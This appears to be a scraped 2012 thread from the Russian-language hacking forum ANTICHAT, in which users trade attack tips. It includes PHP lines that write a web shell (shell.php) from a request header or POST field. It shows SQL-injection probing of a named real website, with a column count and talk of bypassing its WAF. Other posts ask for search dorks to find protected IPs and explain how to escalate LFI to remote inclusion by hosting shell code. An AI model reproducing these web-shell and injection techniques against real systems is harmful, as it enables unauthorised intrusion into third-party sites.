HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21331  
Старый 20.09.2012, 14:30
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от blesse  
blesse said:
Напишите плз пхп код который скачает файл с http://x/x.php и поместит его в
/var/www/htdocs/images/ ?
 
Ответить с цитированием

  #21332  
Старый 20.09.2012, 15:16
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Цитата:
Сообщение от blesse  
blesse said:
Напишите плз пхп код который скачает файл с http://x/x.php и поместит его в
/var/www/htdocs/images/ ?
В случаях ,если IPTABLES strict's or allow_url_fopen=Off ->

file_put_contents('/path/shell.php',$_SERVE['HTTP_USER_AGENT']);

or

file_put_contents('/path/shell.php',$_POST['data']);
 
Ответить с цитированием

  #21333  
Старый 22.09.2012, 13:08
Hapk
Guest
Сообщений: n/a
Провел на форуме:
70690

Репутация: -5
По умолчанию

Почему то не могу раскрутить

http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780'

даже Havij не справился

посмотрите
 
Ответить с цитированием

  #21334  
Старый 22.09.2012, 13:20
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию

Цитата:
Сообщение от Hapk  
Hapk said:
Почему то не могу раскрутить
http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780'
даже Havij не справился
посмотрите
там защита он инъекций, фильтруется union selectt, дальше не смотрел
 
Ответить с цитированием

  #21335  
Старый 22.09.2012, 13:24
Hapk
Guest
Сообщений: n/a
Провел на форуме:
70690

Репутация: -5
По умолчанию

и что больше нечего нельзя сделать?
 
Ответить с цитированием

  #21336  
Старый 22.09.2012, 14:31
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Hapk  
Hapk said:
и что больше нечего нельзя сделать?
http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780+a nd+1=1+group+by+40+--+

TRUE

Ну полей 40 - с этим бы будем считать, что определились...

Теперь надо обойти WAF

UPDATE Фильтруются скобки. Думаю - можешь забить на этот сайт...
 
Ответить с цитированием

  #21337  
Старый 22.09.2012, 20:16
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию

Подскажите пожалуйста что прописать в google чтоб он выдал результаты на который требуеться авторизация как .htaccess?

Пример.

http://195.112.109.83/

http://79.170.27.106/

Незнал где задать вопрос написал здесь,если не правильно просьба модераторов переместить.Спасибо.
 
Ответить с цитированием

  #21338  
Старый 23.09.2012, 03:36
pvitalik80
Guest
Сообщений: n/a
Провел на форуме:
847

Репутация: 0
По умолчанию

LFI уязвимость

include $_GET['include_path'] . '/include/some/file.php';

Нулл-символ экранируется. Версия PHP 5.2.17. Реально ли что-то с этим с делать?
 
Ответить с цитированием

  #21339  
Старый 23.09.2012, 03:55
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от pvitalik80  
pvitalik80 said:
LFI уязвимость
include $_GET['include_path'] . '/include/some/file.php';
Нулл-символ экранируется. Версия PHP 5.2.17. Реально ли что-то с этим с делать?
Ну если я правильно то понял, то возможно RFI c условиями, что

1) allow_url_include = On

2) На своём сервере создать путь /include/some/file.php и в качестве file.php разместить шелл-код.

Вариант событий второй...

Юзать дальше LFI и добраться до любых логов при использовании альтернативы нулл-байта, например 4096 слэшей, почитать об этом можно тут
 
Ответить с цитированием

  #21340  
Старый 23.09.2012, 06:33
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sat-hacker  
Sat-hacker said:
Подскажите пожалуйста что прописать в google чтоб он выдал результаты на который требуеться авторизация как .htaccess?
Пример.
http://195.112.109.83/
http://79.170.27.106/
Незнал где задать вопрос написал здесь,если не правильно просьба модераторов переместить.Спасибо.
Google не индексирует такие страницы.

Цитата:
Сообщение от pvitalik80  
pvitalik80 said:
LFI уязвимость
include $_GET['include_path'] . '/include/some/file.php';
Нулл-символ экранируется. Версия PHP 5.2.17. Реально ли что-то с этим с делать?
Всё достаточно просто.

Если есть возможность проинклудить файл с другого сервера:

http://site.com/shell.php?/include/some/file.php

Если такой возможности нет, то стоит обратить в первую очередь внимание на работу других функций с $_GET['include_path'], а они есть т.к. Null-байт вырезаеться и на _/thread98525.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ